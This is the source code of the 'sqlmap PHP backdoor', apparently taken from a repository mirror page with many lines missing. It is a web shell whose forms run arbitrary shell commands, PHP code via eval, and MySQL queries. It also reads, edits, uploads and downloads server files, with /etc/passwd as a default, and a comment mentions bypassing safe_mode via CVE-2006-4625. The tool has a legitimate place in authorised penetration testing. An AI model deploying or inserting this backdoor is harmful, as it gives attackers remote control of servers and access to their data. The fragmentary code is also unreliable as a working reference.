mirror of
synced 2025-02-27 01:00:35 +03:00
305 lines
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305 lines
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$css="body { background: #FFCC66; font-family: sans-serif; margin: auto; margin-bottom: 1em; margin-top: 1em; width: 95%; } a { color: #663300; text-decoration: none; } input, textarea { border: 1px solid gray; } pre { border: 1px dashed #663300; padding: 5px; background: #fffff0; } table { border-collapse: collapse; border: 1px solid #663300; background: #fffff0; width: 100%; } td, th { border: 1px solid #663300; padding: .3em; } thead th, tfoot th { border: 1px solid #663300; text-align: center; font-size: 1em; font-weight: bold; color: #663300; background: #FFCC66; } #maintitle { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: .3em; text-align: center; } #leftbody { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: .5em; width: 22%; float: left; position: relative; } #rightbody { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: 15px; width: 73%; float: right; position: relative; display:inline; }";
function error($message) {
$completeMessage="<b>Error</b>: " . $message . ".";
function getSymbolByQuantity($bytes) {
$symbols=array('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB');
return @sprintf('%.2f ' . $symbols[$exp], ($bytes/pow(1024, @floor($exp))));
function ex($command) {
if (@function_exists('exec')) {
@exec($command, $res);
$res=@join("\n", $res);
elseif (@function_exists('shell_exec')) {
elseif(@function_exists('system')) {
elseif (@function_exists('passthru')) {
elseif (@is_resource($f=@popen($command, "r"))) {
while(!@feof($f)) {
$res .= @fread($f, 1024);
return $res;
if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
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echo "<meta name=\"author\" content=\"Bernardo Damele A. G.\">";
echo "<meta name=\"robots\" content=\"noindex,nofollow,noarchive\">";
echo "<style type=\"text/css\">" . $css . "</style><title>sqlmap PHP backdoor</title></head>";
echo "<body><div id=\"wrapper\" class=\"clearfix\"><div id=\"maintitle\"><h1>sqlmap PHP backdoor</h1></div><br><div id=\"leftbody\">";
echo "<p><b>System information</b>: <a href=\"" . $phpself . "?sysinfo\">here</a><br>";
echo "<b>PHP info</b>: <a href=\"" . $phpself . "?phpinfo\" target=\"_blank\">here</a><br>";
echo "<b>Send an email</b>: <a href=\"" . $phpself . "?mailForm\">here</a></p>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Read a file</b><br><input type=\"text\" name=\"readFile\" value=\"/etc/passwd\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Edit a file</b><br><input type=\"text\" name=\"editFile\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Download a file</b><br>Directory: <input type=\"text\" name=\"dir\" value=\"/etc\"><br>File: <input type=\"text\" name=\"download\" value=\"passwd\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"POST\" enctype=\"multipart/form-data\"><input type=hidden name=\"MAX_FILE_SIZE\" value=\"1000000000\"><b>Upload a file</b><br><input name=\"file\" type=\"file\"><br>to directory: <input type=\"text\" name=\"uploadDir\" value=\"/tmp\"><input type=\"submit\" name=\"upload\" value=\"upload\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Browse a directory</b><br><input type=\"text\" name=\"listDir\" value=\"/etc\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a shell command</b><br><input type=\"text\" name=\"cmd\" value=\"ps auxfww\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a PHP command</b><br><input type=\"text\" name=\"phpcode\" value=\"ini_get_all()\"><input type=\"submit\" value=\"go\"></form><br>";
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a MySQL query</b><br>host: <input type=\"text\" name=\"host\" value=\"localhost\"><br>user: <input type=\"text\" name=\"user\" value=\"root\"><br>password: <input type=\"password\" name=\"password\"><br>query: <input type=\"text\" name=\"query\"><br><input type=\"submit\" value=\"execute\"></form><br>";
echo "<div style=\"text-align: center\">";
echo "<a href=\"http://validator.w3.org/check/referer\"><img src=\"http://www.w3.org/Icons/valid-html401\" border=\"0\" alt=\"Valid HTML 4.01!\"></a>";
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echo "</div></div><div id=\"rightbody\">";
if (isset($_REQUEST["sysinfo"])) {
if (@strtolower(@substr(@PHP_OS, 0, 3)) == "win") {
else {
if ($safeMode || $openBaseDir) {
* Exploit CVE: CVE-2006-4625
* Affected Software: PHP 5.1.6 / 4.4.4 < = x
* Advisory URL: http://securityreason.com/achievement_securityalert/42
* Try to restore to default value
echo "<b>Operating system</b><br><pre>" . @PHP_OS;
echo "</pre><b>Server uname</b><br><pre>" . php_uname();
echo "</pre><b>Server uptime</b><br><pre>";
echo ex("uptime");
echo "</pre><b>Server time</b><br><pre>";
echo date("D, M d, h:iA");
echo "</pre><b>Disk space</b><br><pre>";
echo "Total space: " . getSymbolByQuantity($total) . "<br>";
echo "Free space: " . getSymbolByQuantity($free);
echo "</pre><b>Web server username</b><br><pre>";
echo (!$win) ? `id` . "<br>" : @get_current_user();
echo "</pre><b>PHP version</b><br><pre>" . @phpversion();
echo "</pre><b>PHP safe_mode</b><br><pre>";
echo ($safeMode) ? "ON<br>" : "OFF<br>";
echo "</pre><b>PHP open_basedir</b><br><pre>";
echo ($openBaseDir) ? "ON<br>" : "OFF<br>";
echo "</pre><b>PHP magic_quotes_gpc</b><br><pre>";
echo ($magicQuotesGpc) ? "ON<br>" : "OFF<br>";
echo "</pre><b>CPU information</b><br><pre>";
echo ex("cat /proc/cpuinfo");
echo "</pre><b>Memory information</b><br><pre>";
echo ex("cat /proc/meminfo");
echo "</pre><b>Open ports and active connections</b><br><pre>";
echo ex("netstat -nat");
echo "</pre><b>Network devices</b><br><pre>";
echo ex("/sbin/ifconfig -a");
echo "</pre><b>Processes</b><br><pre>";
echo ex("ps auxfww");
echo "</pre>";
else if(isset($_REQUEST["phpinfo"])) {
echo @phpinfo();
else if (isset($_REQUEST["readFile"])) {
$fileHandler=@fopen($file, "rb") or error("Unable to read file <code>" . $file . "</code>");
echo "<p>File: <code>" . $file . "</code><p>";
echo "<pre>" . @htmlspecialchars($fileContent) . "</pre>";
else if(isset($_REQUEST["editFile"])) {
if (!$file) {
error("Specify the file to edit");
$fileHandler=@fopen($file, "rb") or error("Unable to read file <code>" . $file . "</code>");
echo "<form action=$phpself method=POST>";
echo "File: <input type=text name=saveFile value=" . $file . " readonly=readonly><br><br>";
echo "<textarea name=contentFile cols=80 rows=40>";
echo $fileContent;
echo "</textarea><br><input type=submit value=Save>";
else if (isset($_REQUEST["saveFile"])) {
if (@is_writable($file)) {
$fileHandler=@fopen($file, "w+") or error("Unable to read file <code>" . $file . "</code>");
@fwrite($fileHandler, $newContent) or error("Unable to write on file <code>" . $file . "</code>");
echo "File <code>" . $file . "</code> successfully written";
else {
error("File <code>" . $file . "</code> is not writable");
else if (isset($_REQUEST["download"])) {
$filename=$dir. "/" . $file;
$fileHandler=@fopen($filename, "rb") or error("Unable to read file <code>" . $file . "</code>");
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($fileContent));
header("Content-disposition: attachment; filename=" . $file . ";");
echo $fileContent;
else if (isset($_REQUEST["upload"])) {
if (!isset($_REQUEST["uploadDir"])) {
error("Specify directory name (ig: /tmp)");
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or error("File upload error");
@chmod($dir . "/" . $file, 0755) or error("Unable to set file permission on <code>" . $file . "</code>");
echo "<p>File <code>" . $file . "</code> successfully uploaded to <code>" . $dir . "</code></p>";
else if (isset($_REQUEST["listDir"])) {
$dirHandler=@opendir($dirToOpen) or error("Unable to open directory");
echo "<p>Directory: <code>" . $dirToOpen . "</code></p>";
echo "<table border=1><tr><thead><th>Name</th><th>Permission</th><th>Owner/Group</th><th>Size</th><th>Read</th><th>Write</th><th>Download</th></thead></tr>";
while ($o=@readdir($dirHandler)) {
foreach ($list as $file) {
if ($file == ".") {
$linkToFile=$dirToOpen . "/" . $file;
echo "<tr><tbody>";
if ($isdir) {
echo "<td><a href=$phpself?listDir=$linkToFile>";
else if ($isfile) {
echo "<td><a href=$phpself?readFile=$linkToFile>";
else {
echo "<td>$linkToFile";
echo "$linkToFile</a></td>";
echo "<td>" . @substr(@sprintf("%o", @fileperms($linkToFile)), -4) . "</td>";
echo "<td>" . $owner["name"] . "/" . $group["name"] . "</td>";
if ($isdir) {
echo "<td>DIR</td>";
else if ($islink) {
echo "<td>LINK</td>";
else if ($isfile) {
echo "<td>" . @sprintf("%u", @filesize($linkToFile)) . " bytes</td>";
else {
echo "<td>Unknown</td>";
echo (@is_readable($linkToFile) && $isfile) ? "<td><a href=$phpself?readFile=$linkToFile>Read</a></td>" : "<td>-</td>";
echo (@is_writable($linkToFile) && $isfile) ? "<td><a href=$phpself?editFile=$linkToFile>Write</a></td>" : "<td>-</td>";
echo (@is_readable($linkToFile) && $isfile) ? "<td><a href=$phpself?dir=$dirToOpen&download=$file>Download</a></td>" : "<td>-</td>";
echo "</tr>";
else if (isset($_REQUEST["mailForm"])) {
echo "<form action=" . $phpself . " method=POST>";
echo "<input name=mail type=hidden><input type=hidden name=mail>";
echo "To: <input name=to type=text value=\"foo@bar.tld\"><br><br>";
echo "Subject: <input name=subject type=text value=\"" . $_SERVER["HTTP_HOST"] . ": sqlmap PHP backdoor\"/><br><br>";
echo "Body:<br><textarea cols=80 rows=40 name=msg></textarea><br>";
echo "<input type=submit value=Send>";
else if (isset($_REQUEST["mail"])) {
$status=@mail($_REQUEST["to"], $_REQUEST["subject"], $_REQUEST["msg"]);
echo $status ? "Mail sent" : "Failed to send mail";
else if (isset($_REQUEST["cmd"])) {
echo "<p>Shell command: <code>" . $cmd . "</code></p>";
echo "<pre>" . ex($cmd) . "</pre>";
else if(isset($_REQUEST["phpcode"])) {
echo "<p>PHP command: <code>" . $code . "</code></p>";
echo "<pre>";
echo @eval("print_r($code);");
echo "</pre>";
else if (isset($_REQUEST["query"])) {
$link=@mysql_connect("$host", "$user", "$password");
if (!$link) {
if (!$result) {
echo "<p>MySQL query: <code>" . $query . "</code></p>";
echo "<pre>";
while ($row=@mysql_fetch_array($result, MYSQL_ASSOC)) {
echo "</pre>";
if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
echo "</div></div></body></html>";